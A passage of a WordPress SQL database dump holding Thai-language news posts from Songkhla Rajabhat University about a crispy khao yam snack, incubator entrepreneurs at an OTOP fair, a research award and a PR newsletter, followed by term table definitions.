(639, 1, '2019-05-27 09:37:43', '2019-05-27 02:37:43', '<span class="size4"><b>พัฒนาข้าวยำกรอบ ไอเดียขึ้นห้าง มรภ.สงขลา</b></span>\r\n\r\nข้าวยำกรอบสมิหลา ผลงานวิจัย มหา วิทยาลัยราชภัฏ (มรภ.) สงขลา ได้รับรางวัลนวัตกรรมดีเด่น ปี 2555 โดยความร่วมมือของคณาจารย์ นักศึกษาและเจ้าหน้าที่คณะเทคโนโลยีการ เกษตร คณะวิทยาศาสตร์และเทคโนโลยี คณะวิทยาการจัดการ และศูนย์บ่มเพาะธุรกิจ\r\n\r\nการบริโภคข้าวยำปักษ์ใต้ ที่มีคุณค่าทางโภชนาการ มีความสมดุลของสารอาหารต่างๆ ส่วนประกอบหลัก คือ ข้าว น้ำบูดู และพืชผักพื้นบ้านนานาชนิด แต่การแปรรูปข้าวยำกรอบสมิหลา ที่ยังคงรสชาติของข้าวยำแท้ๆ สามารถเก็บรักษาได้ยาวนานกว่าของสด อีกทั้งยังสะดวกในการบริโภค เหมาะเป็นของขบเคี้ยวที่อุดมไปด้วยคุณค่าทางอาหารและสมุนไพรไทย\r\nวิธีการทำข้าวยำกรอบสมิหลา นำข้าวสวยไปอบด้วยเตาอบลมร้อน ที่อุณหภูมิ 65 องศาเซลเซียส 3 ชั่วโมง นำข้าวที่ผ่านการอบมาทอดด้วยน้ำมันที่ร้อนจัดให้พองกรอบ และนำเส้นหมี่ไปทอดในน้ำมันที่ร้อนจัด โดยเส้นหมี่ผ่านการอบที่อุณหภูมิ 65 องศาเซลเซียส 2 ชั่วโมง นำผักข้าวยำทั้งหมดมาอบด้วยตู้อบลมร้อน ที่อุณหภูมิ 50 องศาเซลเซียส 5 ชั่วโมง จากนั้นนำข้าว เส้นหมี่ และผักข้าวยำทั้งหมดมาผสมเข้าด้วยกันอย่างเบามือ\r\n\r\nส่วนการทำน้ำข้าวยำ ตั้งกระทะไฟอ่อนใส่บูดู แบะแซ และน้ำตาลปี๊บ เคี่ยวจนงวดแล้วปิดไฟ นำส่วนผสมทั้งหมดที่เตรียมไว้มาคลุกเคล้าให้เข้ากัน แล้วนำไปขึ้นรูปด้วยพิมพ์ ก็จะได้ข้าวยำกรอบสมิหลาที่สามารถเก็บไว้ได้นาน น่ารับประทาน', 'พัฒนาข้าวยำกรอบ ไอเดียขึ้นห้าง มรภ.สงขลา', '', 'publish', 'closed', 'open', '', '%e0%b8%9e%e0%b8%b1%e0%b8%92%e0%b8%99%e0%b8%b2%e0%b8%82%e0%b9%89%e0%b8%b2%e0%b8%a7%e0%b8%a2%e0%b8%b3%e0%b8%81%e0%b8%a3%e0%b8%ad%e0%b8%9a-%e0%b9%84%e0%b8%ad%e0%b9%80%e0%b8%94%e0%b8%b5%e0%b8%a2%e0%b8%82', '', '', '2019-05-27 09:37:43', '2019-05-27 02:37:43', '', 0, 'http://172.17.40.11/wp511/?p=639', 0, 'post', '', 0),
(640, 1, '2019-05-27 09:37:43', '2019-05-27 02:37:43', '<span class="size4"><b>พัฒนาข้าวยำกรอบ ไอเดียขึ้นห้าง มรภ.สงขลา</b></span>\r\n\r\nข้าวยำกรอบสมิหลา ผลงานวิจัย มหา วิทยาลัยราชภัฏ (มรภ.) สงขลา ได้รับรางวัลนวัตกรรมดีเด่น ปี 2555 โดยความร่วมมือของคณาจารย์ นักศึกษาและเจ้าหน้าที่คณะเทคโนโลยีการ เกษตร คณะวิทยาศาสตร์และเทคโนโลยี คณะวิทยาการจัดการ และศูนย์บ่มเพาะธุรกิจ\r\n\r\nการบริโภคข้าวยำปักษ์ใต้ ที่มีคุณค่าทางโภชนาการ มีความสมดุลของสารอาหารต่างๆ ส่วนประกอบหลัก คือ ข้าว น้ำบูดู และพืชผักพื้นบ้านนานาชนิด แต่การแปรรูปข้าวยำกรอบสมิหลา ที่ยังคงรสชาติของข้าวยำแท้ๆ สามารถเก็บรักษาได้ยาวนานกว่าของสด อีกทั้งยังสะดวกในการบริโภค เหมาะเป็นของขบเคี้ยวที่อุดมไปด้วยคุณค่าทางอาหารและสมุนไพรไทย\r\nวิธีการทำข้าวยำกรอบสมิหลา นำข้าวสวยไปอบด้วยเตาอบลมร้อน ที่อุณหภูมิ 65 องศาเซลเซียส 3 ชั่วโมง นำข้าวที่ผ่านการอบมาทอดด้วยน้ำมันที่ร้อนจัดให้พองกรอบ และนำเส้นหมี่ไปทอดในน้ำมันที่ร้อนจัด โดยเส้นหมี่ผ่านการอบที่อุณหภูมิ 65 องศาเซลเซียส 2 ชั่วโมง นำผักข้าวยำทั้งหมดมาอบด้วยตู้อบลมร้อน ที่อุณหภูมิ 50 องศาเซลเซียส 5 ชั่วโมง จากนั้นนำข้าว เส้นหมี่ และผักข้าวยำทั้งหมดมาผสมเข้าด้วยกันอย่างเบามือ\r\n\r\nส่วนการทำน้ำข้าวยำ ตั้งกระทะไฟอ่อนใส่บูดู แบะแซ และน้ำตาลปี๊บ เคี่ยวจนงวดแล้วปิดไฟ นำส่วนผสมทั้งหมดที่เตรียมไว้มาคลุกเคล้าให้เข้ากัน แล้วนำไปขึ้นรูปด้วยพิมพ์ ก็จะได้ข้าวยำกรอบสมิหลาที่สามารถเก็บไว้ได้นาน น่ารับประทาน', 'พัฒนาข้าวยำกรอบ ไอเดียขึ้นห้าง มรภ.สงขลา', '', 'inherit', 'closed', 'closed', '', '639-revision-v1', '', '', '2019-05-27 09:37:43', '2019-05-27 02:37:43', '', 639, 'http://172.17.40.11/wp511/?p=640', 0, 'revision', '', 0),
(641, 1, '2019-05-27 09:38:11', '2019-05-27 02:38:11', 'ผู้ประกอบการศูนย์บ่มเพาะฯ มรภ.สงขลา โชว์ผลงานมหกรรม OTOP ชายแดนใต้\r\n\r\n<b>       ผู้ประกอบการศูนย์บ่มเพาะวิสาหกิจ มรภ.สงขลา นำปลาแผ่นอบกรอบ และสบู่สมุนไพร ดอกดาวเรือง นวัตกรรมใหม่ล่าสุด อวดผลงานในมหกรรมการแสดงและจำหน่ายผลิตภัณฑ์ OTOP กลุ่มจังหวัดชายแดนใต้</b>\r\n\r\nดร.แสนศักดิ์ ศิริพานิช ประธานคณะกรรมการศูนย์บ่มเพาะวิสาหกิจ (UBI) มหาวิทยาลัยราชภัฏสงขลา เปิดเผยว่า ระหว่างวันที่ 20-29 กรกฎาคม 2555 ผู้ประกอบการที่เข้ารับการบ่มเพาะวิสาหกิจจากมหาวิทยาลัยราชภัฏสงขลา (มรภ.สงขลา) จำนวน 2 ราย ได้แก่ ผลิตภัณฑ์ขบเคี้ยว ตราลุงพิน โดย นายอมรศิลป์ คงเจริญ และ ผลิตภัณฑ์จากดอกดาวเรือง ตรา Marigold โดย นางมิ่งขวัญ รัตนภักดี ได้รับเชิญจากการสำนักงานพัฒนาชุมชนจังหวัดสงขลา ให้ไปออกบูธในโครงการมหกรรมการแสดงและจำหน่ายผลิตภัณฑ์ OTOP กลุ่มจังหวัดชายแดนภาคใต้ ประจำปี 2555 ณ หอประชุมนานาชาติฉลองสิริราชย์สมบัติครบ 60 ปี มหาวิทยาลัยสงขลานครินทร์ หาดใหญ่\r\n\r\nดร.แสนศักดิ์ กล่าวว่า ผลิตภัณฑ์ขบเคี้ยว ตราลุงพิน ได้รับการดูแลและให้แนะนำโดย อาจารย์นพรัตน์ วงศ์หิรัญเดชา คณะเทคโนโลยีการเกษตร และ อาจารย์กุลยุทธ บุญเซ่ง คณะเทคโนโลยีอุตสาหกรรม มรภ.สงขลา ซึ่งมีกระบวนการผลิตในการนำเนื้อปลาสดมาคลุกเคล้าเครื่องปรุงสูตรเฉพาะ แปรรูปเป็นปลาแผ่นอบกรอบ ส่วนผลิตภัณฑ์จากดอกดาวเรือง ตรา Marigold ได้รับการดูแลและแนะนำจาก ดร.ทวีสิน นาวารัตน์ คณะวิทยาศาสตร์และเทคโนโลยี อาจารย์รรินา มุกดา และ ดร.ป้องศักดิ์ ทองเนื้อแข็ง คณะวิทยาการจัดการ ซึ่งร่วมกันคิดค้นนวัตกรรมใหม่ในการนำดอกดาวเรืองมาเพิ่มมูลค่า ด้วยการผลิตเป็นสบู่สมุนไพร จนมีรูปลักษณ์ที่เป็นเอกลักษณ์และมีคุณสมบัติที่ไม่เหมือนใคร ซึ่งผลิตภัณฑ์ของผู้ประกอบการทั้ง 2 ราย ต่อยอดองค์ความรู้จากโครงการวิจัยของคณาจารย์มหาวิทยาลัยราชภัฏสงขลา', 'ผู้ประกอบการศูนย์บ่มเพาะฯ มรภ.สงขลา', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%ad%e0%b8%9a%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%a8%e0%b8%b9%e0%b8%99%e0%b8%a2%e0%b9%8c%e0%b8%9a%e0%b9%88%e0%b8%a1%e0%b9%80%e0%b8%9e', '', '', '2019-05-27 09:38:11', '2019-05-27 02:38:11', '', 0, 'http://172.17.40.11/wp511/?p=641', 0, 'post', '', 0),
(642, 1, '2019-05-27 09:38:11', '2019-05-27 02:38:11', 'ผู้ประกอบการศูนย์บ่มเพาะฯ มรภ.สงขลา โชว์ผลงานมหกรรม OTOP ชายแดนใต้\r\n\r\n<b>       ผู้ประกอบการศูนย์บ่มเพาะวิสาหกิจ มรภ.สงขลา นำปลาแผ่นอบกรอบ และสบู่สมุนไพร ดอกดาวเรือง นวัตกรรมใหม่ล่าสุด อวดผลงานในมหกรรมการแสดงและจำหน่ายผลิตภัณฑ์ OTOP กลุ่มจังหวัดชายแดนใต้</b>\r\n\r\nดร.แสนศักดิ์ ศิริพานิช ประธานคณะกรรมการศูนย์บ่มเพาะวิสาหกิจ (UBI) มหาวิทยาลัยราชภัฏสงขลา เปิดเผยว่า ระหว่างวันที่ 20-29 กรกฎาคม 2555 ผู้ประกอบการที่เข้ารับการบ่มเพาะวิสาหกิจจากมหาวิทยาลัยราชภัฏสงขลา (มรภ.สงขลา) จำนวน 2 ราย ได้แก่ ผลิตภัณฑ์ขบเคี้ยว ตราลุงพิน โดย นายอมรศิลป์ คงเจริญ และ ผลิตภัณฑ์จากดอกดาวเรือง ตรา Marigold โดย นางมิ่งขวัญ รัตนภักดี ได้รับเชิญจากการสำนักงานพัฒนาชุมชนจังหวัดสงขลา ให้ไปออกบูธในโครงการมหกรรมการแสดงและจำหน่ายผลิตภัณฑ์ OTOP กลุ่มจังหวัดชายแดนภาคใต้ ประจำปี 2555 ณ หอประชุมนานาชาติฉลองสิริราชย์สมบัติครบ 60 ปี มหาวิทยาลัยสงขลานครินทร์ หาดใหญ่\r\n\r\nดร.แสนศักดิ์ กล่าวว่า ผลิตภัณฑ์ขบเคี้ยว ตราลุงพิน ได้รับการดูแลและให้แนะนำโดย อาจารย์นพรัตน์ วงศ์หิรัญเดชา คณะเทคโนโลยีการเกษตร และ อาจารย์กุลยุทธ บุญเซ่ง คณะเทคโนโลยีอุตสาหกรรม มรภ.สงขลา ซึ่งมีกระบวนการผลิตในการนำเนื้อปลาสดมาคลุกเคล้าเครื่องปรุงสูตรเฉพาะ แปรรูปเป็นปลาแผ่นอบกรอบ ส่วนผลิตภัณฑ์จากดอกดาวเรือง ตรา Marigold ได้รับการดูแลและแนะนำจาก ดร.ทวีสิน นาวารัตน์ คณะวิทยาศาสตร์และเทคโนโลยี อาจารย์รรินา มุกดา และ ดร.ป้องศักดิ์ ทองเนื้อแข็ง คณะวิทยาการจัดการ ซึ่งร่วมกันคิดค้นนวัตกรรมใหม่ในการนำดอกดาวเรืองมาเพิ่มมูลค่า ด้วยการผลิตเป็นสบู่สมุนไพร จนมีรูปลักษณ์ที่เป็นเอกลักษณ์และมีคุณสมบัติที่ไม่เหมือนใคร ซึ่งผลิตภัณฑ์ของผู้ประกอบการทั้ง 2 ราย ต่อยอดองค์ความรู้จากโครงการวิจัยของคณาจารย์มหาวิทยาลัยราชภัฏสงขลา', 'ผู้ประกอบการศูนย์บ่มเพาะฯ มรภ.สงขลา', '', 'inherit', 'closed', 'closed', '', '641-revision-v1', '', '', '2019-05-27 09:38:11', '2019-05-27 02:38:11', '', 641, 'http://172.17.40.11/wp511/?p=642', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(643, 1, '2019-05-27 09:39:11', '2019-05-27 02:39:11', 'สกว. เลือกข้าวยำกรอบ-ปลาหวานสมิหลา งานวิจัย มรภ.สงขลา นวัตกรรมดีเด่นปี 55\r\n\r\n<b>       สกว. เลือกข้าวยำกรอบและปลาหวานสมิหลา 2 งานวิจัยเด่น มรภ.สงขลา รับรางวัลนวัตกรรมดีเด่น มหกรรมวิชาการ ปี 2555 ต่อยอดเชิงพาณิชย์จากท้องถิ่นสู่สากล</b>\r\n\r\n<b>ดร.แสนศักดิ์ ศิริพานิช</b> รองอธิการบดีฝ่ายวิจัยและชุมชนสัมพันธ์ มหาวิทยาลัยราชภัฏสงขลา (มรภ.สงขลา) เปิดเผยว่า เมื่อวันที่ 20-24 มิถุนายน ที่ผ่านมา ศูนย์บ่มเพาะธุรกิจ มรภ.สงขลา (SKRU-UBI) ได้สนับสนุนงบประมาณในการนำเสนอผลงานวิจัยที่สามารถนำมาต่อยอดเป็นเชิงพาณิชย์ ในงานมหกรรมวิชาการ สกว. โครงการธุรกิจสร้างสรรค์ จากท้องถิ่นสู่สากล ณ. ฮอลล์ 7-8 ศูนย์แสดงสินค้าและการประชุมอิมแพ็ค เมืองทองธานี จ.นนทบุรี โดยศูนย์บ่มเพาะธุรกิจ มหาวิทยาลัยราชภัฏสงขลา ได้เข้าร่วมออกบูธจำหน่ายสินค้าและร่วมกิจกรรมประกวดแผนธุรกิจ ซึ่ง สกว. ได้คัดเลือกผลงานวิจัยของ มรภ.สงขลา 2 ผลงาน คือปลาหวานสมิหลาและข้าวยำกรอบสมิหลา รับรางวัลนวัตกรรมดีเด่น ปี 2555\r\n\r\n<b>น.ส. อมราวดี วงศ์เทพ</b> ผู้จัดการศูนย์บ่มเพาะธุรกิจ มรภ.สงขลา กล่าวว่า คณะผู้วิจัยทั้ง 2 ผลงานได้เสนอผลิตภัณฑ์และแผนธุรกิจเข้าประกวดด้านธุรกิจสร้างสรรค์ และท้องถิ่นสู่สากล ร่วมกันในนามของมรภ.สงขลา โดยความร่วมมือของคณาจารย์ นักศึกษาและเจ้าหน้าที่คณะเทคโนโลยีการเกษตร คณะวิทยาศาสตร์และเทคโนโลยี คณะวิทยาการจัดการ และศูนย์บ่มเพาะธุรกิจ มรภ.สงขลา จนได้รับรางวัลดีเด่นด้านนวัตกรรม (Innovation) ธุรกิจสร้างสรรค์ จากท้องถิ่นสู่สากล ซึ่งกิจกรรมในครั้งนี้ทำให้งานวิจัยท้องถิ่นได้รับการยกระดับความสำคัญในการนำไปใช้ประโยชน์อย่างแท้จริง โดยศูนย์บ่มเพาะธุรกิจจะให้การสนับสนุนงานวิจัยที่สามารถต่อยอดผลงานจากหิ้งสู่ห้าง ซึ่งงานวิจัยที่ได้รับรางวัลในครั้งนี้ มีการพัฒนารูปแบบการจัดกระบวนการเรียนการสอน ให้นักศึกษามีความรู้ความสามารถในอันที่จะนำไปสู่การประกอบอาชีพธุรกิจอาหารต่อไป\r\n\r\n<b>       ด้าน</b> <b>นายดำรงค์เกียรติ ศรีเทพ</b> อาจารย์ประจำโปรแกรมวิชาคหกรรมศาสตร์ คณะวิทยาศาสตร์และเทคโนโลยี มรภ.สงขลา หนึ่งในคณะผู้วิจัย กล่าวถึงงานวิจัยข้าวยำกรอบสมิหลา ว่า เป็นการต่อยอดจากโครงการวิจัยความหลากหลายทางวัฒนธรรมการผลิต และการบริโภคข้าวยำปักษ์ใต้ โดยทำงานร่วมกับ ดร.ทัศนา เมฆเวียน ภายใต้แนวคิดที่ว่าข้าวยำเป็นอาหารพื้นบ้านของภาคใต้ที่มีคุณค่าทางโภชนาการ มีความสมดุล (Balance diet) ของสารอาหารต่างๆ ส่วนประกอบหลัก คือ ข้าว น้ำบูดู และพืชผักพื้นบ้านนานาชนิด ข้าวยำมีความแตกต่างกันตามวัฒนธรรมการกินของแต่ละชุมชน นิยมบริโภคเป็นอาหารหลัก และต้องบริโภคเป็นของสด ไม่สามารถเก็บรักษาไว้ได้นาน ซึ่งในวิถีชีวิตของคนในสังคมปัจจุบันที่มีความเร่งรีบ ต้องการความสะดวกในการจัดหาอาหารเพื่อการบริโภค ข้าวยำกรอบสมิหลา จึงเป็นทางเลือกหนึ่งสำหรับผู้ที่ต้องการบริโภคอาหารพื้นเมืองที่ทรงคุณค่าทางโภชนาการ เป็นภูมิปัญญาท้องถิ่นภาคใต้ สมควรแก่การอนุรักษ์ไว้ ด้วยการนำมาแปรรูปในรูปของข้าวยำกรอบสมิหลา ที่ยังคงรสชาติของข้าวยำแท้ๆ สามารถเก็บรักษาได้ยาวนานกว่าของสด อีกทั้งยังสะดวกในการบริโภค เหมาะเป็นของขบเคี้ยวที่อุดมไปด้วยคุณค่าทางอาหารและสมุนไพรไทย และเหมาะเป็นของฝากอย่างยิ่ง', 'สกว. เลือกข้าวยำกรอบ-ปลาหวานสมิหลา', '', 'publish', 'closed', 'open', '', '%e0%b8%aa%e0%b8%81%e0%b8%a7-%e0%b9%80%e0%b8%a5%e0%b8%b7%e0%b8%ad%e0%b8%81%e0%b8%82%e0%b9%89%e0%b8%b2%e0%b8%a7%e0%b8%a2%e0%b8%b3%e0%b8%81%e0%b8%a3%e0%b8%ad%e0%b8%9a-%e0%b8%9b%e0%b8%a5%e0%b8%b2', '', '', '2019-05-27 09:39:11', '2019-05-27 02:39:11', '', 0, 'http://172.17.40.11/wp511/?p=643', 0, 'post', '', 0),
(644, 1, '2019-05-27 09:39:11', '2019-05-27 02:39:11', 'สกว. เลือกข้าวยำกรอบ-ปลาหวานสมิหลา งานวิจัย มรภ.สงขลา นวัตกรรมดีเด่นปี 55\r\n\r\n<b>       สกว. เลือกข้าวยำกรอบและปลาหวานสมิหลา 2 งานวิจัยเด่น มรภ.สงขลา รับรางวัลนวัตกรรมดีเด่น มหกรรมวิชาการ ปี 2555 ต่อยอดเชิงพาณิชย์จากท้องถิ่นสู่สากล</b>\r\n\r\n<b>ดร.แสนศักดิ์ ศิริพานิช</b> รองอธิการบดีฝ่ายวิจัยและชุมชนสัมพันธ์ มหาวิทยาลัยราชภัฏสงขลา (มรภ.สงขลา) เปิดเผยว่า เมื่อวันที่ 20-24 มิถุนายน ที่ผ่านมา ศูนย์บ่มเพาะธุรกิจ มรภ.สงขลา (SKRU-UBI) ได้สนับสนุนงบประมาณในการนำเสนอผลงานวิจัยที่สามารถนำมาต่อยอดเป็นเชิงพาณิชย์ ในงานมหกรรมวิชาการ สกว. โครงการธุรกิจสร้างสรรค์ จากท้องถิ่นสู่สากล ณ. ฮอลล์ 7-8 ศูนย์แสดงสินค้าและการประชุมอิมแพ็ค เมืองทองธานี จ.นนทบุรี โดยศูนย์บ่มเพาะธุรกิจ มหาวิทยาลัยราชภัฏสงขลา ได้เข้าร่วมออกบูธจำหน่ายสินค้าและร่วมกิจกรรมประกวดแผนธุรกิจ ซึ่ง สกว. ได้คัดเลือกผลงานวิจัยของ มรภ.สงขลา 2 ผลงาน คือปลาหวานสมิหลาและข้าวยำกรอบสมิหลา รับรางวัลนวัตกรรมดีเด่น ปี 2555\r\n\r\n<b>น.ส. อมราวดี วงศ์เทพ</b> ผู้จัดการศูนย์บ่มเพาะธุรกิจ มรภ.สงขลา กล่าวว่า คณะผู้วิจัยทั้ง 2 ผลงานได้เสนอผลิตภัณฑ์และแผนธุรกิจเข้าประกวดด้านธุรกิจสร้างสรรค์ และท้องถิ่นสู่สากล ร่วมกันในนามของมรภ.สงขลา โดยความร่วมมือของคณาจารย์ นักศึกษาและเจ้าหน้าที่คณะเทคโนโลยีการเกษตร คณะวิทยาศาสตร์และเทคโนโลยี คณะวิทยาการจัดการ และศูนย์บ่มเพาะธุรกิจ มรภ.สงขลา จนได้รับรางวัลดีเด่นด้านนวัตกรรม (Innovation) ธุรกิจสร้างสรรค์ จากท้องถิ่นสู่สากล ซึ่งกิจกรรมในครั้งนี้ทำให้งานวิจัยท้องถิ่นได้รับการยกระดับความสำคัญในการนำไปใช้ประโยชน์อย่างแท้จริง โดยศูนย์บ่มเพาะธุรกิจจะให้การสนับสนุนงานวิจัยที่สามารถต่อยอดผลงานจากหิ้งสู่ห้าง ซึ่งงานวิจัยที่ได้รับรางวัลในครั้งนี้ มีการพัฒนารูปแบบการจัดกระบวนการเรียนการสอน ให้นักศึกษามีความรู้ความสามารถในอันที่จะนำไปสู่การประกอบอาชีพธุรกิจอาหารต่อไป\r\n\r\n<b>       ด้าน</b> <b>นายดำรงค์เกียรติ ศรีเทพ</b> อาจารย์ประจำโปรแกรมวิชาคหกรรมศาสตร์ คณะวิทยาศาสตร์และเทคโนโลยี มรภ.สงขลา หนึ่งในคณะผู้วิจัย กล่าวถึงงานวิจัยข้าวยำกรอบสมิหลา ว่า เป็นการต่อยอดจากโครงการวิจัยความหลากหลายทางวัฒนธรรมการผลิต และการบริโภคข้าวยำปักษ์ใต้ โดยทำงานร่วมกับ ดร.ทัศนา เมฆเวียน ภายใต้แนวคิดที่ว่าข้าวยำเป็นอาหารพื้นบ้านของภาคใต้ที่มีคุณค่าทางโภชนาการ มีความสมดุล (Balance diet) ของสารอาหารต่างๆ ส่วนประกอบหลัก คือ ข้าว น้ำบูดู และพืชผักพื้นบ้านนานาชนิด ข้าวยำมีความแตกต่างกันตามวัฒนธรรมการกินของแต่ละชุมชน นิยมบริโภคเป็นอาหารหลัก และต้องบริโภคเป็นของสด ไม่สามารถเก็บรักษาไว้ได้นาน ซึ่งในวิถีชีวิตของคนในสังคมปัจจุบันที่มีความเร่งรีบ ต้องการความสะดวกในการจัดหาอาหารเพื่อการบริโภค ข้าวยำกรอบสมิหลา จึงเป็นทางเลือกหนึ่งสำหรับผู้ที่ต้องการบริโภคอาหารพื้นเมืองที่ทรงคุณค่าทางโภชนาการ เป็นภูมิปัญญาท้องถิ่นภาคใต้ สมควรแก่การอนุรักษ์ไว้ ด้วยการนำมาแปรรูปในรูปของข้าวยำกรอบสมิหลา ที่ยังคงรสชาติของข้าวยำแท้ๆ สามารถเก็บรักษาได้ยาวนานกว่าของสด อีกทั้งยังสะดวกในการบริโภค เหมาะเป็นของขบเคี้ยวที่อุดมไปด้วยคุณค่าทางอาหารและสมุนไพรไทย และเหมาะเป็นของฝากอย่างยิ่ง', 'สกว. เลือกข้าวยำกรอบ-ปลาหวานสมิหลา', '', 'inherit', 'closed', 'closed', '', '643-revision-v1', '', '', '2019-05-27 09:39:11', '2019-05-27 02:39:11', '', 643, 'http://172.17.40.11/wp511/?p=644', 0, 'revision', '', 0),
(645, 1, '2019-05-27 10:19:09', '2019-05-27 03:19:09', 'วารสารเพื่อการประชาสัมพันธ์มหาวิทยาลัยราชภัฏสงขลา  อ่านต่อที่ <a href="http://172.17.40.11/wp511/wp-content/uploads/2019/05/ปาริฉัตร-ปีที่7-ฉบับที่3-1.pdf">ปาริฉัตร ปีที่7 ฉบับที่3</a>', 'ปาริฉัตร  ปีที่7  ฉบับที่3  (กุมภาพันธ์ - มีนาคม 2556)', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%b2%e0%b8%a3%e0%b8%b4%e0%b8%89%e0%b8%b1%e0%b8%95%e0%b8%a3-%e0%b8%9b%e0%b8%b5%e0%b8%97%e0%b8%b5%e0%b9%887-%e0%b8%89%e0%b8%9a%e0%b8%b1%e0%b8%9a%e0%b8%97%e0%b8%b5%e0%b9%883-%e0%b8%81', '', '', '2019-05-27 10:20:51', '2019-05-27 03:20:51', '', 0, 'http://172.17.40.11/wp511/?p=645', 0, 'post', '', 0),
(647, 1, '2019-05-27 10:18:33', '2019-05-27 03:18:33', '', 'ปาริฉัตร ปีที่7 ฉบับที่3', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%b2%e0%b8%a3%e0%b8%b4%e0%b8%89%e0%b8%b1%e0%b8%95%e0%b8%a3-%e0%b8%9b%e0%b8%b5%e0%b8%97%e0%b8%b5%e0%b9%887-%e0%b8%89%e0%b8%9a%e0%b8%b1%e0%b8%9a%e0%b8%97%e0%b8%b5%e0%b9%883-2', '', '', '2019-05-27 10:18:33', '2019-05-27 03:18:33', '', 645, 'http://172.17.40.11/wp511/wp-content/uploads/2019/05/ปาริฉัตร-ปีที่7-ฉบับที่3-1.pdf', 0, 'attachment', 'application/pdf', 0),
(648, 1, '2019-05-27 10:19:09', '2019-05-27 03:19:09', 'วารสารเพื่อการประชาสัมพันธ์มหาวิทยาลัยราชภัฏสงขลา  อ่านต่อที่ <a href="http://172.17.40.11/wp511/wp-content/uploads/2019/05/ปาริฉัตร-ปีที่7-ฉบับที่3-1.pdf">ปาริฉัตร ปีที่7 ฉบับที่3</a>', 'ปาริฉัตร  ปีที่7  ฉบับที่3  (กุมภาพันธ์ - มีนาคม 2556)', '', 'inherit', 'closed', 'closed', '', '645-revision-v1', '', '', '2019-05-27 10:19:09', '2019-05-27 03:19:09', '', 645, 'http://172.17.40.11/wp511/?p=648', 0, 'revision', '', 0),
(649, 1, '2019-05-27 10:20:58', '2019-05-27 03:20:58', 'วารสารเพื่อการประชาสัมพันธ์มหาวิทยาลัยราชภัฏสงขลา  อ่านต่อที่ <a href="http://172.17.40.11/wp511/wp-content/uploads/2019/05/ปาริฉัตร-ปีที่7-ฉบับที่3-1.pdf">ปาริฉัตร ปีที่7 ฉบับที่3</a>', 'ปาริฉัตร  ปีที่7  ฉบับที่3  (กุมภาพันธ์ - มีนาคม 2556)', '', 'inherit', 'closed', 'closed', '', '645-autosave-v1', '', '', '2019-05-27 10:20:58', '2019-05-27 03:20:58', '', 645, 'http://172.17.40.11/wp511/?p=649', 0, 'revision', '', 0),
(650, 1, '2019-05-27 10:20:51', '2019-05-27 03:20:51', 'วารสารเพื่อการประชาสัมพันธ์มหาวิทยาลัยราชภัฏสงขลา  อ่านต่อที่ <a href="http://172.17.40.11/wp511/wp-content/uploads/2019/05/ปาริฉัตร-ปีที่7-ฉบับที่3-1.pdf">ปาริฉัตร ปีที่7 ฉบับที่3</a>', 'ปาริฉัตร  ปีที่7  ฉบับที่3  (กุมภาพันธ์ - มีนาคม 2556)', '', 'inherit', 'closed', 'closed', '', '645-revision-v1', '', '', '2019-05-27 10:20:51', '2019-05-27 03:20:51', '', 645, 'http://172.17.40.11/wp511/?p=650', 0, 'revision', '', 0);

-- --------------------------------------------------------

--
-- Table structure for table `wp_termmeta`
--

CREATE TABLE IF NOT EXISTS `wp_termmeta` (
  `meta_id` bigint(20) unsigned NOT NULL,
  `term_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `meta_key` varchar(255) COLLATE utf8_general_ci DEFAULT NULL,
  `meta_value` longtext COLLATE utf8_general_ci
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `wp_terms`
--

CREATE TABLE IF NOT EXISTS `wp_terms` (
  `term_id` bigint(20) unsigned NOT NULL,
  `name` varchar(200) COLLATE utf8_general_ci NOT NULL DEFAULT '',
  `slug` varchar(200) COLLATE utf8_general_ci NOT NULL DEFAULT '',
  `term_group` bigint(10) NOT NULL DEFAULT '0'
) ENGINE=InnoDB AUTO_INCREMENT=20 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `wp_terms`
--

INSERT INTO `wp_terms` (`term_id`, `name`, `slug`, `term_group`) VALUES
(1, 'ไม่มีหมวดหมู่', '%e0%b9%84%e0%b8%a1%e0%b9%88%e0%b8%a1%e0%b8%b5%e0%b8%ab%e0%b8%a1%e0%b8%a7%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b9%e0%b9%88', 0),
(5, 'เพลงประจำมหาวิทยาลัย', 'song', 0),
(6, 'ครุยวิทยะฐานะ', 'graduatedress', 0),
(7, 'ทำเนียบผู้บริหาร', 'executives', 0),
(8, 'อาจารย์เกษียณอายุราชการ', 'teacherretired', 0),
(9, 'บัณฑิตกิตติมศักดิ์', 'honorarygraduate', 0),
(10, 'บุคคลดีเด่น', 'personexcellent', 0),
(11, 'เหตุการณ์ ข่าว ของมหาวิทยาลัยราชภัฏสงขลา', 'newsevent', 0),
(12, 'ภาพแห่งความทรงจำ', 'pictureofmemory', 0),
(13, 'ผลงานอาจารย์ นักศึกษา', 'portfoliostudentteacher', 0),
(14, 'เอกสารเผยแพร่ของมหาวิทยาลัย', 'universitypublication', 0),
(15, 'mainmenu', 'mainmenu', 0),
(16, 'topmenu', 'topmenu', 0),
(17, 'post-format-image', 'post-format-image', 0),
(18, 'เข้าสู่ระบบ', '%e0%b9%80%e0%b8%82%e0%b9%89%e0%b8%b2%e0%b8%aa%e0%b8%b9%e0%b9%88%e0%b8%a3%e0%b8%b0%e0%b8%9a%e0%b8%9a', 0),
(19, 'หอจดหมายเหตุ', 'archives', 0);

-- --------------------------------------------------------

--
-- Table structure for table `wp_term_relationships`
--

CREATE TABLE IF NOT EXISTS `wp_term_relationships` (
  `object_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `term_taxonomy_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `term_order` int(11) NOT NULL DEFAULT '0'
